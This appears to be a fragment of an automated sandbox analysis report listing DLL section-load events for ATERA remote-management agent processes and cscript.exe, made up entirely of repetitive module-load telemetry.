                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptnet.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wldp.dll
